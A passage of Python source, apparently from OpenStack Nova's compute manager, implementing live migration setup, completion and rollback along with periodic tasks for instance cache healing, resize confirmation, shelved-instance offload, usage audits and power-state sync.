CONF.compute.live_migration_wait_for_vif_plug):
return [('network-vif-plugged', vif['id'])
for vif in instance.get_network_info()]
else:
return []
def _cleanup_pre_live_migration(self, context, dest, instance,
migration, migrate_data):
"""Helper method for when pre_live_migration fails
Sets the migration status to "error" and rolls back the live migration
setup on the destination host.
:param context: The user request context.
:type context: nova.context.RequestContext
:param dest: The live migration destination hostname.
:type dest: str
:param instance: The instance being live migrated.
:type instance: nova.objects.Instance
:param migration: The migration record tracking this live migration.
:type migration: nova.objects.Migration
:param migrate_data: Data about the live migration, populated from
the destination host.
:type migrate_data: Subclass of nova.objects.LiveMigrateData
"""
self._set_migration_status(migration, 'error')
        # Make sure migrate_data carries the migration so that
        # _rollback_live_migration() can find it, just as it would if it
        # were called later by the driver.
migrate_data.migration = migration
self._rollback_live_migration(context, instance, dest,
migrate_data)
def _do_live_migration(self, context, dest, instance, block_migration,
migration, migrate_data):
# NOTE(danms): We should enhance the RT to account for migrations
# and use the status field to denote when the accounting has been
# done on source/destination. For now, this is just here for status
# reporting
self._set_migration_status(migration, 'preparing')
events = self._get_neutron_events_for_live_migration(instance)
try:
if ('block_migration' in migrate_data and
migrate_data.block_migration):
block_device_info = self._get_instance_block_device_info(
context, instance)
disk = self.driver.get_instance_disk_info(
instance, block_device_info=block_device_info)
else:
disk = None
deadline = CONF.vif_plugging_timeout
error_cb = self._neutron_failed_live_migration_callback
# In order to avoid a race with the vif plugging that the virt
# driver does on the destination host, we register our events
# to wait for before calling pre_live_migration.
with self.virtapi.wait_for_instance_event(
instance, events, deadline=deadline,
error_callback=error_cb):
migrate_data = self.compute_rpcapi.pre_live_migration(
context, instance,
block_migration, disk, dest, migrate_data)
except exception.VirtualInterfacePlugException:
with excutils.save_and_reraise_exception():
LOG.exception('Failed waiting for network virtual interfaces '
'to be plugged on the destination host %s.',
dest, instance=instance)
self._cleanup_pre_live_migration(
context, dest, instance, migration, migrate_data)
except eventlet.timeout.Timeout:
msg = 'Timed out waiting for events: %s'
LOG.warning(msg, events, instance=instance)
if CONF.vif_plugging_is_fatal:
self._cleanup_pre_live_migration(
context, dest, instance, migration, migrate_data)
raise exception.MigrationError(reason=msg % events)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception('Pre live migration failed at %s',
dest, instance=instance)
self._cleanup_pre_live_migration(
context, dest, instance, migration, migrate_data)
self._set_migration_status(migration, 'running')
if migrate_data:
migrate_data.migration = migration
LOG.debug('live_migration data is %s', migrate_data)
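        # Hand off to the virt driver; it invokes _post_live_migration on
        # success and _rollback_live_migration on failure via the callbacks
        # passed below.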
try:
self.driver.live_migration(context, instance, dest,
self._post_live_migration,
self._rollback_live_migration,
block_migration, migrate_data)
except Exception:
LOG.exception('Live migration failed.', instance=instance)
with excutils.save_and_reraise_exception():
# Put instance and migration into error state,
                # as it's almost certainly too late to roll back
self._set_migration_status(migration, 'error')
                # first refresh instance as it may have been updated by
                # post_live_migration_at_destination
instance.refresh()
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def live_migration(self, context, dest, instance, block_migration,
migration, migrate_data):
"""Executing live migration.
:param context: security context
:param dest: destination host
:param instance: a nova.objects.instance.Instance object
:param block_migration: if true, prepare for block migration
:param migration: an nova.objects.Migration object
:param migrate_data: implementation specific params
"""
self._set_migration_status(migration, 'queued')
def dispatch_live_migration(*args, **kwargs):
with self._live_migration_semaphore:
self._do_live_migration(*args, **kwargs)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
self.instance_running_pool.spawn_n(dispatch_live_migration,
context, dest, instance,
block_migration, migration,
migrate_data)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def live_migration_force_complete(self, context, instance):
"""Force live migration to complete.
:param context: Security context
:param instance: The instance that is being migrated
"""
self._notify_about_instance_usage(
context, instance, 'live.migration.force.complete.start')
self.driver.live_migration_force_complete(instance)
self._notify_about_instance_usage(
context, instance, 'live.migration.force.complete.end')
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def live_migration_abort(self, context, instance, migration_id):
"""Abort an in-progress live migration.
:param context: Security context
:param instance: The instance that is being migrated
:param migration_id: ID of in-progress live migration
"""
migration = objects.Migration.get_by_id(context, migration_id)
if migration.status != 'running':
raise exception.InvalidMigrationState(migration_id=migration_id,
instance_uuid=instance.uuid,
state=migration.status,
method='abort live migration')
self._notify_about_instance_usage(
context, instance, 'live.migration.abort.start')
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ABORT,
phase=fields.NotificationPhase.START)
self.driver.live_migration_abort(instance)
self._notify_about_instance_usage(
context, instance, 'live.migration.abort.end')
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ABORT,
phase=fields.NotificationPhase.END)
def _live_migration_cleanup_flags(self, migrate_data):
"""Determine whether disks or instance path need to be cleaned up after
live migration (at source on success, at destination on rollback)
        Block migration needs an empty image at the destination host before
        the migration starts, so if any failure occurs, those empty images
        have to be deleted.
        Also, volume-backed live migration w/o shared storage needs to delete
        the newly created instance-xxx dir on the destination as a part of
        its rollback process.
:param migrate_data: implementation specific data
:returns: (bool, bool) -- do_cleanup, destroy_disks
"""
# NOTE(pkoniszewski): block migration specific params are set inside
# migrate_data objects for drivers that expose block live migration
# information (i.e. Libvirt, Xenapi and HyperV). For other drivers
# cleanup is not needed.
is_shared_block_storage = True
is_shared_instance_path = True
if isinstance(migrate_data, migrate_data_obj.LibvirtLiveMigrateData):
is_shared_block_storage = migrate_data.is_shared_block_storage
is_shared_instance_path = migrate_data.is_shared_instance_path
elif isinstance(migrate_data, migrate_data_obj.XenapiLiveMigrateData):
is_shared_block_storage = not migrate_data.block_migration
is_shared_instance_path = not migrate_data.block_migration
elif isinstance(migrate_data, migrate_data_obj.HyperVLiveMigrateData):
is_shared_instance_path = migrate_data.is_shared_instance_path
is_shared_block_storage = migrate_data.is_shared_instance_path
        # No instance is booting at the source host, but the instance dir
        # must be deleted to prepare for the next block migration or the
        # next live migration w/o shared storage.
do_cleanup = not is_shared_instance_path
destroy_disks = not is_shared_block_storage
return (do_cleanup, destroy_disks)
@wrap_exception()
@wrap_instance_fault
def _post_live_migration(self, ctxt, instance,
dest, block_migration=False, migrate_data=None):
"""Post operations for live migration.
        This method is called from live_migration and mainly updates the
        database record.
:param ctxt: security context
:param instance: instance dict
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which has data
required for live migration without shared storage
"""
        LOG.info('_post_live_migration() is started.',
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
# Cleanup source host post live-migration
block_device_info = self._get_instance_block_device_info(
ctxt, instance, bdms=bdms)
self.driver.post_live_migration(ctxt, instance, block_device_info,
migrate_data)
# Detaching volumes.
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
if bdm.is_volume:
# Detaching volumes is a call to an external API that can fail.
# If it does, we need to handle it gracefully so that the call
# to post_live_migration_at_destination - where we set instance
# host and task state - still happens. We need to rethink the
# current approach of setting instance host and task state
# AFTER a whole bunch of things that could fail in unhandled
# ways, but that is left as a TODO(artom).
try:
if bdm.attachment_id is None:
# Prior to cinder v3.44:
# We don't want to actually mark the volume detached,
# or delete the bdm, just remove the connection from
# this host.
#
# remove the volume connection without detaching from
# hypervisor because the instance is not running
# anymore on the current host
self.volume_api.terminate_connection(ctxt,
bdm.volume_id,
connector)
else:
# cinder v3.44 api flow - delete the old attachment
# for the source host
old_attachment_id = \
migrate_data.old_vol_attachment_ids[bdm.volume_id]
self.volume_api.attachment_delete(ctxt,
old_attachment_id)
except Exception as e:
if bdm.attachment_id is None:
LOG.error('Connection for volume %s not terminated on '
'source host %s during post_live_migration: '
'%s', bdm.volume_id, self.host,
six.text_type(e), instance=instance)
else:
LOG.error('Volume attachment %s not deleted on source '
'host %s during post_live_migration: %s',
old_attachment_id, self.host,
six.text_type(e), instance=instance)
# Releasing vlan.
# (not necessary in current implementation?)
network_info = self.network_api.get_instance_nw_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.start",
network_info=network_info)
# Releasing security group ingress rule.
LOG.debug('Calling driver.unfilter_instance from _post_live_migration',
instance=instance)
self.driver.unfilter_instance(instance,
network_info)
migration = {'source_compute': self.host,
'dest_compute': dest, }
self.network_api.migrate_instance_start(ctxt,
instance,
migration)
destroy_vifs = False
try:
self.driver.post_live_migration_at_source(ctxt, instance,
network_info)
except NotImplementedError as ex:
LOG.debug(ex, instance=instance)
            # For all hypervisors other than libvirt, there is a possibility
            # that they unplug networks from the source node in the cleanup
            # method.
destroy_vifs = True
# NOTE(danms): Save source node before calling post method on
# destination, which will update it
source_node = instance.node
        # Define the domain at the destination host; without doing it,
        # pause/suspend/terminate do not work.
post_at_dest_success = True
try:
self.compute_rpcapi.post_live_migration_at_destination(ctxt,
instance, block_migration, dest)
except Exception as error:
post_at_dest_success = False
# We don't want to break _post_live_migration() if
# post_live_migration_at_destination() fails as it should never
# affect cleaning up source node.
LOG.exception("Post live migration at destination %s failed",
dest, instance=instance, error=error)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
migrate_data)
if do_cleanup:
LOG.debug('Calling driver.cleanup from _post_live_migration',
instance=instance)
self.driver.cleanup(ctxt, instance, network_info,
destroy_disks=destroy_disks,
migrate_data=migrate_data,
destroy_vifs=destroy_vifs)
self.instance_events.clear_events_for_instance(instance)
# NOTE(timello): make sure we update available resources on source
# host even before next periodic task.
self.update_available_resource(ctxt)
self._update_scheduler_instance_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.end",
network_info=network_info)
if post_at_dest_success:
LOG.info('Migrating instance to %s finished successfully.',
dest, instance=instance)
if migrate_data and migrate_data.obj_attr_is_set('migration'):
migrate_data.migration.status = 'completed'
migrate_data.migration.save()
migration = migrate_data.migration
rc = self.scheduler_client.reportclient
# Check to see if our migration has its own allocations
allocs = rc.get_allocations_for_consumer(ctxt, migration.uuid)
else:
# We didn't have data on a migration, which means we can't
# look up to see if we had new-style migration-based
# allocations. This should really only happen in cases of
# a buggy virt driver or some really old component in the
# system. Log a warning so we know it happened.
allocs = None
LOG.warning('Live migration ended with no migrate_data '
'record. Unable to clean up migration-based '
'allocations which is almost certainly not '
'an expected situation.')
if allocs:
# We had a migration-based allocation that we need to handle
self._delete_allocation_after_move(ctxt,
instance,
migrate_data.migration,
instance.flavor,
source_node)
else:
# No migration-based allocations, so do the old thing and
# attempt to clean up any doubled per-instance allocation
rt = self._get_resource_tracker()
rt.delete_allocation_for_migrated_instance(
ctxt, instance, source_node)
    def _consoles_enabled(self):
        """Returns whether any console type is enabled."""
return (CONF.vnc.enabled or CONF.spice.enabled or
CONF.rdp.enabled or CONF.serial_console.enabled or
CONF.mks.enabled)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def post_live_migration_at_destination(self, context, instance,
                                           block_migration):
        """Post operations for live migration.
:param context: security context
:param instance: Instance dict
:param block_migration: if true, prepare for block migration
"""
LOG.info('Post operation of migration started',
instance=instance)
# NOTE(tr3buchet): setup networks on destination host
# this is called a second time because
# multi_host does not create the bridge in
# plug_vifs
self.network_api.setup_networks_on_host(context, instance,
self.host)
migration = {'source_compute': instance.host,
'dest_compute': self.host, }
self.network_api.migrate_instance_finish(context,
instance,
migration)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(context,
instance)
try:
self.driver.post_live_migration_at_destination(
context, instance, network_info, block_migration,
block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
instance.vm_state = vm_states.ERROR
LOG.error('Unexpected error during post live migration at '
'destination host.', instance=instance)
finally:
# Restore instance state and update host
current_power_state = self._get_power_state(context, instance)
node_name = None
prev_host = instance.host
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception('Failed to get compute_info for %s', self.host)
finally:
instance.host = self.host
instance.power_state = current_power_state
instance.task_state = None
instance.node = node_name
instance.progress = 0
instance.save(expected_task_state=task_states.MIGRATING)
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
prev_host, teardown=True)
# NOTE(vish): this is necessary to update dhcp
self.network_api.setup_networks_on_host(context, instance, self.host)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.end",
network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def _rollback_live_migration(self, context, instance,
dest, migrate_data=None,
migration_status='error'):
"""Recovers Instance/volume state from migrating -> running.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param dest:
This method is called from live migration src host.
This param specifies destination host.
:param migrate_data:
if not none, contains implementation specific data.
:param migration_status:
Contains the status we want to set for the migration object
"""
if (isinstance(migrate_data, migrate_data_obj.LiveMigrateData) and
migrate_data.obj_attr_is_set('migration')):
migration = migrate_data.migration
else:
migration = None
if migration:
# Remove allocations created in Placement for the dest node.
# If migration is None, we must be so old we don't have placement,
# so no need to do something else.
self._revert_allocation(context, instance, migration)
else:
LOG.error('Unable to revert allocations during live migration '
'rollback; compute driver did not provide migrate_data',
instance=instance)
instance.task_state = None
instance.progress = 0
instance.save(expected_task_state=[task_states.MIGRATING])
# NOTE(tr3buchet): setup networks on source host (really it's re-setup)
self.network_api.setup_networks_on_host(context, instance, self.host)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.is_volume:
# remove the connection on the destination host
self.compute_rpcapi.remove_volume_connection(
context, instance, bdm.volume_id, dest)
if bdm.attachment_id:
# 3.44 cinder api flow. Set the bdm's
# attachment_id to the old attachment of the source
# host. If old_attachments is not there, then
# there was an error before the new attachment was made.
old_attachments = migrate_data.old_vol_attachment_ids \
if 'old_vol_attachment_ids' in migrate_data else None
if old_attachments and bdm.volume_id in old_attachments:
self.volume_api.attachment_delete(context,
bdm.attachment_id)
bdm.attachment_id = old_attachments[bdm.volume_id]
bdm.save()
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.start")
compute_utils.notify_about_instance_action(context, instance,
self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ROLLBACK,
phase=fields.NotificationPhase.START,
bdms=bdms)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
migrate_data)
if do_cleanup:
self.compute_rpcapi.rollback_live_migration_at_destination(
context, instance, dest, destroy_disks=destroy_disks,
migrate_data=migrate_data)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.end")
compute_utils.notify_about_instance_action(context, instance,
self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ROLLBACK,
phase=fields.NotificationPhase.END,
bdms=bdms)
self._set_migration_status(migration, migration_status)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks,
                                               migrate_data):
        """Clean up the image directory that is created by pre_live_migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object sent over rpc
:param destroy_disks: whether to destroy volumes or not
:param migrate_data: contains migration info
"""
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.start",
network_info=network_info)
try:
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host, teardown=True)
except Exception:
with excutils.save_and_reraise_exception():
# NOTE(tdurakov): even if teardown networks fails driver
# should try to rollback live migration on destination.
LOG.exception('An error occurred while deallocating network.',
instance=instance)
finally:
# always run this even if setup_networks_on_host fails
# NOTE(vish): The mapping is passed in so the driver can disconnect
# from remote volumes if necessary
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.rollback_live_migration_at_destination(
context, instance, network_info, block_device_info,
destroy_disks=destroy_disks, migrate_data=migrate_data)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.end",
network_info=network_info)
@periodic_task.periodic_task(
spacing=CONF.heal_instance_info_cache_interval)
def _heal_instance_info_cache(self, context):
"""Called periodically. On every call, try to update the
info_cache's network information for another instance by
calling to the network manager.
This is implemented by keeping a cache of uuids of instances
that live on this host. On each call, we pop one off of a
list, pull the DB record, and try the call to the network API.
        If anything errors, don't fail, as it's possible the instance
has been deleted, etc.
"""
heal_interval = CONF.heal_instance_info_cache_interval
if not heal_interval:
return
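        # Work through the cached list of instance uuids, one per periodic
        # run, rebuilding the list from the database when it runs out.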
instance_uuids = getattr(self, '_instance_uuids_to_heal', [])
instance = None
LOG.debug('Starting heal instance info cache')
if not instance_uuids:
# The list of instances to heal is empty so rebuild it
LOG.debug('Rebuilding the list of instances to heal')
db_instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=[], use_slave=True)
for inst in db_instances:
# We don't want to refresh the cache for instances
# which are building or deleting so don't put them
# in the list. If they are building they will get
# added to the list next time we build it.
if (inst.vm_state == vm_states.BUILDING):
LOG.debug('Skipping network cache update for instance '
'because it is Building.', instance=inst)
continue
if (inst.task_state == task_states.DELETING):
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
continue
if not instance:
# Save the first one we find so we don't
# have to get it again
instance = inst
else:
instance_uuids.append(inst['uuid'])
self._instance_uuids_to_heal = instance_uuids
else:
# Find the next valid instance on the list
while instance_uuids:
try:
inst = objects.Instance.get_by_uuid(
context, instance_uuids.pop(0),
expected_attrs=['system_metadata', 'info_cache',
'flavor'],
use_slave=True)
except exception.InstanceNotFound:
# Instance is gone. Try to grab another.
continue
# Check the instance hasn't been migrated
if inst.host != self.host:
LOG.debug('Skipping network cache update for instance '
'because it has been migrated to another '
'host.', instance=inst)
                # Check the instance isn't being deleted
elif inst.task_state == task_states.DELETING:
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
else:
instance = inst
break
if instance:
# We have an instance now to refresh
try:
# Call to network API to get instance info.. this will
# force an update to the instance's info_cache
self.network_api.get_instance_nw_info(context, instance)
LOG.debug('Updated the network info_cache for instance',
instance=instance)
except exception.InstanceNotFound:
# Instance is gone.
LOG.debug('Instance no longer exists. Unable to refresh',
instance=instance)
return
except exception.InstanceInfoCacheNotFound:
# InstanceInfoCache is gone.
LOG.debug('InstanceInfoCache no longer exists. '
'Unable to refresh', instance=instance)
except Exception:
LOG.error('An error occurred while refreshing the network '
'cache.', instance=instance, exc_info=True)
else:
LOG.debug("Didn't find any instances for network info cache "
"update.")
@periodic_task.periodic_task
def _poll_rebooting_instances(self, context):
if CONF.reboot_timeout > 0:
filters = {'task_state':
[task_states.REBOOTING,
task_states.REBOOT_STARTED,
task_states.REBOOT_PENDING],
'host': self.host}
rebooting = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=[], use_slave=True)
to_poll = []
for instance in rebooting:
if timeutils.is_older_than(instance.updated_at,
CONF.reboot_timeout):
to_poll.append(instance)
self.driver.poll_rebooting_instances(CONF.reboot_timeout, to_poll)
@periodic_task.periodic_task
def _poll_rescued_instances(self, context):
if CONF.rescue_timeout > 0:
filters = {'vm_state': vm_states.RESCUED,
'host': self.host}
rescued_instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=["system_metadata"],
use_slave=True)
to_unrescue = []
for instance in rescued_instances:
if timeutils.is_older_than(instance.launched_at,
CONF.rescue_timeout):
to_unrescue.append(instance)
for instance in to_unrescue:
self.compute_api.unrescue(context, instance)
@periodic_task.periodic_task
def _poll_unconfirmed_resizes(self, context):
if CONF.resize_confirm_window == 0:
return
migrations = objects.MigrationList.get_unconfirmed_by_dest_compute(
context, CONF.resize_confirm_window, self.host,
use_slave=True)
migrations_info = dict(migration_count=len(migrations),
confirm_window=CONF.resize_confirm_window)
if migrations_info["migration_count"] > 0:
LOG.info("Found %(migration_count)d unconfirmed migrations "
"older than %(confirm_window)d seconds",
migrations_info)
def _set_migration_to_error(migration, reason, **kwargs):
LOG.warning("Setting migration %(migration_id)s to error: "
"%(reason)s",
{'migration_id': migration['id'], 'reason': reason},
**kwargs)
migration.status = 'error'
with migration.obj_as_admin():
migration.save()
for migration in migrations:
instance_uuid = migration.instance_uuid
LOG.info("Automatically confirming migration "
"%(migration_id)s for instance %(instance_uuid)s",
{'migration_id': migration.id,
'instance_uuid': instance_uuid})
expected_attrs = ['metadata', 'system_metadata']
try:
instance = objects.Instance.get_by_uuid(context,
instance_uuid, expected_attrs=expected_attrs,
use_slave=True)
except exception.InstanceNotFound:
reason = (_("Instance %s not found") %
instance_uuid)
_set_migration_to_error(migration, reason)
continue
if instance.vm_state == vm_states.ERROR:
reason = _("In ERROR state")
_set_migration_to_error(migration, reason,
instance=instance)
continue
            # race condition: an instance in DELETING state should not have
            # its migration set to error, otherwise the instance that is being
            # deleted while in RESIZED state would never be able to confirm
            # the resize.
if instance.task_state in [task_states.DELETING,
task_states.SOFT_DELETING]:
msg = ("Instance being deleted or soft deleted during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
# race condition: This condition is hit when this method is
# called between the save of the migration record with a status of
# finished and the save of the instance object with a state of
# RESIZED. The migration record should not be set to error.
if instance.task_state == task_states.RESIZE_FINISH:
msg = ("Instance still resizing during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
vm_state = instance.vm_state
task_state = instance.task_state
if vm_state != vm_states.RESIZED or task_state is not None:
reason = (_("In states %(vm_state)s/%(task_state)s, not "
"RESIZED/None") %
{'vm_state': vm_state,
'task_state': task_state})
_set_migration_to_error(migration, reason,
instance=instance)
continue
try:
self.compute_api.confirm_resize(context, instance,
migration=migration)
except Exception as e:
LOG.info("Error auto-confirming resize: %s. "
"Will retry later.", e, instance=instance)
@periodic_task.periodic_task(spacing=CONF.shelved_poll_interval)
def _poll_shelved_instances(self, context):
if CONF.shelved_offload_time <= 0:
return
filters = {'vm_state': vm_states.SHELVED,
'task_state': None,
'host': self.host}
shelved_instances = objects.InstanceList.get_by_filters(
context, filters=filters, expected_attrs=['system_metadata'],
use_slave=True)
to_gc = []
for instance in shelved_instances:
sys_meta = instance.system_metadata
shelved_at = timeutils.parse_strtime(sys_meta['shelved_at'])
if timeutils.is_older_than(shelved_at, CONF.shelved_offload_time):
to_gc.append(instance)
for instance in to_gc:
try:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save(expected_task_state=(None,))
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
except Exception:
LOG.exception('Periodic task failed to offload instance.',
instance=instance)
@periodic_task.periodic_task
def _instance_usage_audit(self, context):
if not CONF.instance_usage_audit:
return
begin, end = utils.last_completed_audit_period()
if objects.TaskLog.get(context, 'instance_usage_audit', begin, end,
self.host):
return
instances = objects.InstanceList.get_active_by_window_joined(
context, begin, end, host=self.host,
expected_attrs=['system_metadata', 'info_cache', 'metadata',
'flavor'],
use_slave=True)
num_instances = len(instances)
errors = 0
successes = 0
LOG.info("Running instance usage audit for host %(host)s "
"from %(begin_time)s to %(end_time)s. "
"%(number_instances)s instances.",
{'host': self.host,
'begin_time': begin,
'end_time': end,
'number_instances': num_instances})
start_time = time.time()
task_log = objects.TaskLog(context)
task_log.task_name = 'instance_usage_audit'
task_log.period_beginning = begin
task_log.period_ending = end
task_log.host = self.host
task_log.task_items = num_instances
task_log.message = 'Instance usage audit started...'
task_log.begin_task()
for instance in instances:
try:
compute_utils.notify_usage_exists(
self.notifier, context, instance,
ignore_missing_network_data=False)
successes += 1
except Exception:
LOG.exception('Failed to generate usage '
'audit for instance '
'on host %s', self.host,
instance=instance)
errors += 1
task_log.errors = errors
task_log.message = (
'Instance usage audit ran for host %s, %s instances in %s seconds.'
% (self.host, num_instances, time.time() - start_time))
task_log.end_task()
@periodic_task.periodic_task(spacing=CONF.bandwidth_poll_interval)
def _poll_bandwidth_usage(self, context):
if not self._bw_usage_supported:
return
prev_time, start_time = utils.last_completed_audit_period()
curr_time = time.time()
if (curr_time - self._last_bw_usage_poll >
CONF.bandwidth_poll_interval):
self._last_bw_usage_poll = curr_time
LOG.info("Updating bandwidth usage cache")
cells_update_interval = CONF.cells.bandwidth_update_interval
if (cells_update_interval > 0 and
curr_time - self._last_bw_usage_cell_update >
cells_update_interval):
self._last_bw_usage_cell_update = curr_time
update_cells = True
else:
update_cells = False
instances = objects.InstanceList.get_by_host(context,
self.host,
use_slave=True)
try:
bw_counters = self.driver.get_all_bw_counters(instances)
except NotImplementedError:
# NOTE(mdragon): Not all hypervisors have bandwidth polling
# implemented yet. If they don't it doesn't break anything,
# they just don't get the info in the usage events.
# NOTE(PhilDay): Record that its not supported so we can
# skip fast on future calls rather than waste effort getting
# the list of instances.
LOG.info("Bandwidth usage not supported by %(driver)s.",
{'driver': CONF.compute_driver})
self._bw_usage_supported = False
return
refreshed = timeutils.utcnow()
for bw_ctr in bw_counters:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
bw_in = 0
bw_out = 0
last_ctr_in = None
last_ctr_out = None
usage = objects.BandwidthUsage.get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=start_time, use_slave=True)
if usage:
bw_in = usage.bw_in
bw_out = usage.bw_out
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
else:
usage = (objects.BandwidthUsage.
get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=prev_time, use_slave=True))
if usage:
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
if last_ctr_in is not None:
if bw_ctr['bw_in'] < last_ctr_in:
# counter rollover
bw_in += bw_ctr['bw_in']
else:
bw_in += (bw_ctr['bw_in'] - last_ctr_in)
if last_ctr_out is not None:
if bw_ctr['bw_out'] < last_ctr_out:
# counter rollover
bw_out += bw_ctr['bw_out']
else:
bw_out += (bw_ctr['bw_out'] - last_ctr_out)
objects.BandwidthUsage(context=context).create(
bw_ctr['uuid'],
bw_ctr['mac_address'],
bw_in,
bw_out,
bw_ctr['bw_in'],
bw_ctr['bw_out'],
start_period=start_time,
last_refreshed=refreshed,
update_cells=update_cells)
def _get_host_volume_bdms(self, context, use_slave=False):
"""Return all block device mappings on a compute host."""
compute_host_bdms = []
instances = objects.InstanceList.get_by_host(context, self.host,
use_slave=use_slave)
for instance in instances:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=use_slave)
instance_bdms = [bdm for bdm in bdms if bdm.is_volume]
compute_host_bdms.append(dict(instance=instance,
instance_bdms=instance_bdms))
return compute_host_bdms
def _update_volume_usage_cache(self, context, vol_usages):
"""Updates the volume usage cache table with a list of stats."""
for usage in vol_usages:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
vol_usage = objects.VolumeUsage(context)
vol_usage.volume_id = usage['volume']
vol_usage.instance_uuid = usage['instance'].uuid
vol_usage.project_id = usage['instance'].project_id
vol_usage.user_id = usage['instance'].user_id
vol_usage.availability_zone = usage['instance'].availability_zone
vol_usage.curr_reads = usage['rd_req']
vol_usage.curr_read_bytes = usage['rd_bytes']
vol_usage.curr_writes = usage['wr_req']
vol_usage.curr_write_bytes = usage['wr_bytes']
vol_usage.save()
self.notifier.info(context, 'volume.usage',
compute_utils.usage_volume_info(vol_usage))
@periodic_task.periodic_task(spacing=CONF.volume_usage_poll_interval)
def _poll_volume_usage(self, context):
if CONF.volume_usage_poll_interval == 0:
return
compute_host_bdms = self._get_host_volume_bdms(context,
use_slave=True)
if not compute_host_bdms:
return
LOG.debug("Updating volume usage cache")
try:
vol_usages = self.driver.get_all_volume_usage(context,
compute_host_bdms)
except NotImplementedError:
return
self._update_volume_usage_cache(context, vol_usages)
@periodic_task.periodic_task(spacing=CONF.sync_power_state_interval,
run_immediately=True)
def _sync_power_states(self, context):
"""Align power states between the database and the hypervisor.
To sync power state data we make a DB call to get the number of
virtual machines known by the hypervisor and if the number matches the
number of virtual machines known by the database, we proceed in a lazy
loop, one database record at a time, checking if the hypervisor has the
same power state as is in the database.
"""
db_instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
num_vm_instances = self.driver.get_num_instances()
num_db_instances = len(db_instances)
if num_vm_instances != num_db_instances:
LOG.warning("While synchronizing instance power states, found "
"%(num_db_instances)s instances in the database "
"and %(num_vm_instances)s instances on the "
"hypervisor.",
{'num_db_instances': num_db_instances,
'num_vm_instances': num_vm_instances})
def _sync(db_instance):
# NOTE(melwitt): This must be synchronized as we query state from
# two separate sources, the driver and the database.
# They are set (in stop_instance) and read, in sync.
@utils.synchronized(db_instance.uuid)
def query_driver_power_state_and_sync():
self._query_driver_power_state_and_sync(context, db_instance)
try:
sleep_time = random.randint(1, CONF.sync_power_state_interval)
greenthread.sleep(sleep_time)
query_driver_power_state_and_sync()
except Exception:
LOG.exception("Periodic sync_power_state task had an "
"error while processing an instance.",
instance=db_instance)
self._syncs_in_progress.pop(db_instance.uuid)
for db_instance in db_instances:
# process syncs asynchronously - don't want instance locking to
# block entire periodic task thread
uuid = db_instance.uuid
if uuid in self._syncs_in_progress:
LOG.debug('Sync already in progress for %s', uuid)
else:
LOG.debug('Triggering sync for uuid %s', uuid)
self._syncs_in_progress[uuid] = True
self._sync_power_pool.spawn_n(_sync, db_instance)
def _query_driver_power_state_and_sync(self, context, db_instance):
if db_instance.task_state is not None:
LOG.info("During sync_power_state the instance has a "
"pending task (%(task)s). Skip.",
{'task': db_instance.task_state}, instance=db_instance)
return
# No pending tasks. Now try to figure out the real vm_power_state.
try:
vm_instance = self.driver.get_info(db_instance)
